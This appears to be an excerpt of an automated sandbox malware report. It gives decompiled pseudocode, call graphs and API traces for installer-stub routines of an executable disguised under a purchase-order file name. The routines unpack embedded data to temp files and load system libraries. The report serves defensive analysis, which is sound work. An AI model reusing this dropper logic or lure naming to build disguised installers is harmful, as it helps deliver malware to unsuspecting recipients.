                                                                                                                          control_flow_graph 415 402f2e-402f3d 416 402f5b-402f66 call 403059 415->416 417 402f3f-402f55 SetFilePointer 415->417 420 403052-403056 416->420 421 402f6c-402f86 ReadFile 416->421 417->416 422 402f8c-402f8f 421->422 423 40304f 421->423 422->423 424 402f95-402fa8 call 403059 422->424 425 403051 423->425 424->420 428 402fae-402fb1 424->428 425->420 429 402fb3-402fb6 428->429 430 40301e-403024 428->430 433 40304a-40304d 429->433 434 402fbc 429->434 431 403026 430->431 432 403029-40303c ReadFile 430->432 431->432 432->423 435 40303e-403047 432->435 433->420 436 402fc1-402fc9 434->436 435->433 437 402fcb 436->437 438 402fce-402fe0 ReadFile 436->438 437->438 438->423 439 402fe2-402fe5 438->439 439->423 440 402fe7-402ffc WriteFile 439->440 441 40301a-40301c 440->441 442 402ffe-403001 440->442 441->425 442->441 443 403003-403016 442->443 443->436 444 403018 443->444 444->433
                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E00402F2E(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423fd8;
					 *0x417124 = _t44;
					SetFilePointer( *0x409018, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E00403059(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x417124 =  *0x417124 + _t57;
						_t32 = E00403059(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x417124 =  *0x417124 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409018, 0x413120, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413120, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x417124 =  *0x417124 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

















                                                                                                                          0x00402f33
                                                                                                                          0x00402f3d
                                                                                                                          0x00402f46
                                                                                                                          0x00402f4a
                                                                                                                          0x00402f55
                                                                                                                          0x00402f55
                                                                                                                          0x00402f5d
                                                                                                                          0x00402f5f
                                                                                                                          0x00402f66
                                                                                                                          0x00402f82
                                                                                                                          0x00402f86
                                                                                                                          0x0040304f
                                                                                                                          0x0040304f
                                                                                                                          0x00000000
                                                                                                                          0x00402f95
                                                                                                                          0x00402f98
                                                                                                                          0x00402f9e
                                                                                                                          0x00402fa5
                                                                                                                          0x00402fa8
                                                                                                                          0x00402fb1
                                                                                                                          0x0040301e
                                                                                                                          0x00403024
                                                                                                                          0x00403026
                                                                                                                          0x00403026
                                                                                                                          0x00403038
                                                                                                                          0x0040303c
                                                                                                                          0x00000000
                                                                                                                          0x0040303e
                                                                                                                          0x0040303e
                                                                                                                          0x00403041
                                                                                                                          0x00403047
                                                                                                                          0x00000000
                                                                                                                          0x00403047
                                                                                                                          0x00402fb3
                                                                                                                          0x00402fb6
                                                                                                                          0x0040304a
                                                                                                                          0x0040304a
                                                                                                                          0x00402fbc
                                                                                                                          0x00402fc1
                                                                                                                          0x00402fc1
                                                                                                                          0x00402fc9
                                                                                                                          0x00402fcb
                                                                                                                          0x00402fcb
                                                                                                                          0x00402fdc
                                                                                                                          0x00402fe0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402ff4
                                                                                                                          0x00402ffc
                                                                                                                          0x0040301a
                                                                                                                          0x00403051
                                                                                                                          0x00403051
                                                                                                                          0x00403003
                                                                                                                          0x00403003
                                                                                                                          0x00403006
                                                                                                                          0x00403009
                                                                                                                          0x0040300c
                                                                                                                          0x00403016
                                                                                                                          0x00000000
                                                                                                                          0x00403018
                                                                                                                          0x00000000
                                                                                                                          0x00403018
                                                                                                                          0x00403016
                                                                                                                          0x00000000
                                                                                                                          0x00402ffc
                                                                                                                          0x00000000
                                                                                                                          0x00402fc1
                                                                                                                          0x00402fb6
                                                                                                                          0x00402fb1
                                                                                                                          0x00402fa8
                                                                                                                          0x00402f86
                                                                                                                          0x00403052
                                                                                                                          0x00403056

                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402F55
                                                                                                                          • ReadFile.KERNELBASE(?,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000,00000000,?), ref: 00402F82
                                                                                                                          • ReadFile.KERNELBASE(00413120,00004000,?,00000000,?,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402FDC
                                                                                                                          • WriteFile.KERNELBASE(00000000,00413120,?,000000FF,00000000,?,00402EDA,000000FF,00000000,00000000,?,?), ref: 00402FF4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Read$PointerWrite
                                                                                                                          • String ID: 1A
                                                                                                                          • API String ID: 2113905535-9103686
                                                                                                                          • Opcode ID: dfd426ff9148373ae1b38b35403f472367688ea5597ee74420ff68edd34f8a5f
                                                                                                                          • Instruction ID: 82d5fff184c734a1787b3ae727349c02325da9e894cdbedb842e9025a389ee8f
                                                                                                                          • Opcode Fuzzy Hash: dfd426ff9148373ae1b38b35403f472367688ea5597ee74420ff68edd34f8a5f
                                                                                                                          • Instruction Fuzzy Hash: 9A313871501209FBCF21DF55DD44AAF3BB8EB44765F20403AF904A6291D3389F91DBA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00403059 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 445 403059-403082 GetTickCount 446 4031c3-4031cb call 402be9 445->446 447 403088-4030b3 call 403207 SetFilePointer 445->447 452 4031cd-4031d2 446->452 453 4030b8-4030ca 447->453 454 4030cc 453->454 455 4030ce-4030dc call 4031d5 453->455 454->455 458 4030e2-4030ee 455->458 459 4031b5-4031b8 455->459 460 4030f4-4030fa 458->460 459->452 461 403125-403141 call 406184 460->461 462 4030fc-403102 460->462 468 403143-40314b 461->468 469 4031be 461->469 462->461 463 403104-403124 call 402be9 462->463 463->461 471 40314d-403163 WriteFile 468->471 472 40317f-403185 468->472 470 4031c0-4031c1 469->470 470->452 473 403165-403169 471->473 474 4031ba-4031bc 471->474 472->469 475 403187-403189 472->475 473->474 476 40316b-403177 473->476 474->470 475->469 477 40318b-40319e 475->477 476->460 478 40317d 476->478 477->453 479 4031a4-4031b3 SetFilePointer 477->479 478->477 479->446
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E00403059(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x417124; // 0x565e2
				_t37 = _t35 -  *0x40b090 + _a4;
				 *0x423f8c = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BE9(1);
					return 0;
				}
				E00403207( *0x41f134);
				SetFilePointer( *0x409018,  *0x40b090, 0, 0); // executed
				 *0x41f130 = _t37;
				 *0x417120 = 0;
				while(1) {
					_t12 =  *0x417128; // 0x630a6
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f134;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031D5(0x413120, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f134 =  *0x41f134 + _t34;
					 *0x40b0b0 = 0x413120;
					 *0x40b0b4 = _t34;
					L6:
					L6:
					if( *0x423f90 != 0 &&  *0x424020 == 0) {
						 *0x417120 =  *0x41f130 -  *0x417124 - _a4 +  *0x40b090;
						E00402BE9(0);
					}
					 *0x40b0b8 = 0x40b120;
					 *0x40b0bc = 0x8000; // executed
					_t16 = E00406184(0x40b098); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40b0b8; // 0x40fb25
					_t40 = _t39 - 0x40b120;
					if(_t40 == 0) {
						__eflags =  *0x40b0b4; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x417124; // 0x565e2
						if(_t18 -  *0x40b090 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409018, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409018, 0x40b120, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40b090 =  *0x40b090 + _t40;
						_t53 =  *0x40b0b4; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}


















                                                                                                                          0x0040305d
                                                                                                                          0x0040306a
                                                                                                                          0x0040307d
                                                                                                                          0x00403082
                                                                                                                          0x004031c3
                                                                                                                          0x004031c5
                                                                                                                          0x00000000
                                                                                                                          0x004031cb
                                                                                                                          0x0040308e
                                                                                                                          0x004030a1
                                                                                                                          0x004030a7
                                                                                                                          0x004030ad
                                                                                                                          0x004030b8
                                                                                                                          0x004030b8
                                                                                                                          0x004030bd
                                                                                                                          0x004030c2
                                                                                                                          0x004030ca
                                                                                                                          0x004030cc
                                                                                                                          0x004030cc
                                                                                                                          0x004030d5
                                                                                                                          0x004030dc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004030e2
                                                                                                                          0x004030e8
                                                                                                                          0x004030ee
                                                                                                                          0x00000000
                                                                                                                          0x004030f4
                                                                                                                          0x004030fa
                                                                                                                          0x0040311a
                                                                                                                          0x0040311f
                                                                                                                          0x00403124
                                                                                                                          0x0040312a
                                                                                                                          0x00403130
                                                                                                                          0x0040313a
                                                                                                                          0x00403141
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403143
                                                                                                                          0x00403149
                                                                                                                          0x0040314b
                                                                                                                          0x0040317f
                                                                                                                          0x00403185
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403187
                                                                                                                          0x00403189
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040318b
                                                                                                                          0x0040318b
                                                                                                                          0x0040319e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004031ad
                                                                                                                          0x00000000
                                                                                                                          0x004031ad
                                                                                                                          0x0040315b
                                                                                                                          0x00403163
                                                                                                                          0x004031ba
                                                                                                                          0x004031c0
                                                                                                                          0x004031c0
                                                                                                                          0x00000000
                                                                                                                          0x0040316b
                                                                                                                          0x0040316b
                                                                                                                          0x00403171
                                                                                                                          0x00403177
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040317d
                                                                                                                          0x004031be
                                                                                                                          0x004031be
                                                                                                                          0x00000000
                                                                                                                          0x004031be
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 0040306E
                                                                                                                            • Part of subcall function 00403207: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EB3,?), ref: 00403215
                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?,?,00402EDA,000000FF,00000000), ref: 004030A1
                                                                                                                          • WriteFile.KERNELBASE(0040B120,0040FB25,00000000,00000000,00413120,00004000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?), ref: 0040315B
                                                                                                                          • SetFilePointer.KERNELBASE(000565E2,00000000,00000000,00413120,00004000,?,00000000,?,00402F64,00000004,00000000,00000000,00000000,?,?), ref: 004031AD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Pointer$CountTickWrite
                                                                                                                          • String ID: 1A
                                                                                                                          • API String ID: 2146148272-9103686
                                                                                                                          • Opcode ID: 0cf6868b9e9647ca11da496d61e231f9210f9a3003146b68b5f630b0a2b16ff6
                                                                                                                          • Instruction ID: 4dd4975a9f59093c3e0d8581b597c69eeb1c8b76cfa1fe2ad7fe21498de3e5f3
                                                                                                                          • Opcode Fuzzy Hash: 0cf6868b9e9647ca11da496d61e231f9210f9a3003146b68b5f630b0a2b16ff6
                                                                                                                          • Instruction Fuzzy Hash: 16418D72518201AFC7109F29EE849673BBDF708356714423BEA60B62E0D7386D098B9D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 480 4015b3-4015c6 call 402a0c call 405882 485 4015c8-4015e3 call 405819 CreateDirectoryA 480->485 486 40160a-40160d 480->486 493 401600-401608 485->493 494 4015e5-4015f0 GetLastError 485->494 488 40162d-40217f call 401423 486->488 489 40160f-401628 call 401423 call 405cfb SetCurrentDirectoryA 486->489 501 4028a1-4028b0 488->501 489->501 493->485 493->486 497 4015f2-4015fb GetFileAttributesA 494->497 498 4015fd 494->498 497->493 497->498 498->493
                                                                                                                          C-Code - Quality: 85%
                                                                                                                          			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A0C(0xfffffff0);
				_t10 = E00405882(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405819(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x24)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405CFB("C:\\Users\\alfons\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                                                                          0x004015b3
                                                                                                                          0x004015ba
                                                                                                                          0x004015bd
                                                                                                                          0x004015c2
                                                                                                                          0x004015c6
                                                                                                                          0x004015c8
                                                                                                                          0x004015d0
                                                                                                                          0x004015d6
                                                                                                                          0x004015d8
                                                                                                                          0x004015db
                                                                                                                          0x004015e3
                                                                                                                          0x004015f0
                                                                                                                          0x004015fd
                                                                                                                          0x004015fd
                                                                                                                          0x004015f2
                                                                                                                          0x004015f3
                                                                                                                          0x004015fb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004015fb
                                                                                                                          0x004015f0
                                                                                                                          0x00401600
                                                                                                                          0x00401603
                                                                                                                          0x00401605
                                                                                                                          0x00401606
                                                                                                                          0x004015c8
                                                                                                                          0x0040160d
                                                                                                                          0x0040162d
                                                                                                                          0x0040217a
                                                                                                                          0x0040160f
                                                                                                                          0x00401611
                                                                                                                          0x0040161c
                                                                                                                          0x00401622
                                                                                                                          0x00401622
                                                                                                                          0x004028a4
                                                                                                                          0x004028b0

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405882: CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,766DF560,00405634,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 00405890
                                                                                                                            • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 00405895
                                                                                                                            • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 004058A4
                                                                                                                          • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                                          • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                          • API String ID: 3751793516-1943935188
                                                                                                                          • Opcode ID: 50ec374d6edcfb4941514268ae499aae1e4c08cda85895cc054099465040d3ce
                                                                                                                          • Instruction ID: d0a9f9296d723caddbd0f60560613e174b6a475f07d6f089b0aabedb845a292b
                                                                                                                          • Opcode Fuzzy Hash: 50ec374d6edcfb4941514268ae499aae1e4c08cda85895cc054099465040d3ce
                                                                                                                          • Instruction Fuzzy Hash: CE010832908140AFD7217B755D4497F37B4DE91369724463FF891B22E1C63C0D42962E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040601D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 505 40601d-40603d GetSystemDirectoryA 506 406041-406043 505->506 507 40603f 505->507 508 406053-406055 506->508 509 406045-40604d 506->509 507->506 511 406056-406084 wsprintfA LoadLibraryA 508->511 509->508 510 40604f-406051 509->510 510->511
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040601D(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryA( &_v292); // executed
				return _t14;
			}








                                                                                                                          0x00406034
                                                                                                                          0x0040603d
                                                                                                                          0x0040603f
                                                                                                                          0x0040603f
                                                                                                                          0x00406043
                                                                                                                          0x00406055
                                                                                                                          0x0040604f
                                                                                                                          0x0040604f
                                                                                                                          0x0040604f
                                                                                                                          0x00406059
                                                                                                                          0x0040606d
                                                                                                                          0x0040607d
                                                                                                                          0x00406084

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                          • String ID: %s%s.dll$\
                                                                                                                          • API String ID: 2200240437-500877883
                                                                                                                          • Opcode ID: ab578b0f6e67864073cc7e0faf31571440b610376f19e1ac75bbbc29e234aff8
                                                                                                                          • Instruction ID: 31df564d024cf24b7dbdd433d12669610400c14d1f093727c30223d65afe2acb
                                                                                                                          • Opcode Fuzzy Hash: ab578b0f6e67864073cc7e0faf31571440b610376f19e1ac75bbbc29e234aff8
                                                                                                                          • Instruction Fuzzy Hash: CBF02B309441095BDF14E764DC0DEFB375CEB08344F0445BBA54BE10D2FA78E8698B98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405A01 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 512 405a01-405a0b 513 405a0c-405a36 GetTickCount GetTempFileNameA 512->513 514 405a45-405a47 513->514 515 405a38-405a3a 513->515 517 405a3f-405a42 514->517 515->513 516 405a3c 515->516 516->517
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405A01(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                                                          0x00405a05
                                                                                                                          0x00405a0b
                                                                                                                          0x00405a0c
                                                                                                                          0x00405a0c
                                                                                                                          0x00405a0d
                                                                                                                          0x00405a14
                                                                                                                          0x00405a1e
                                                                                                                          0x00405a2b
                                                                                                                          0x00405a2e
                                                                                                                          0x00405a36
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405a3a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405a3c
                                                                                                                          0x00000000
                                                                                                                          0x00405a3c
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00405A14
                                                                                                                          • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405A2E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                          • String ID: "C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                          • API String ID: 1716503409-196553006
                                                                                                                          • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                          • Instruction ID: 5b0006bac455ae629d1f86c67115003f625ce1c04593d449782858effb37a924
                                                                                                                          • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                          • Instruction Fuzzy Hash: 81F020327082087BEB104E49EC44B9B7FADDFC5720F10C12BFA049A1C0C2B0A9488BA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

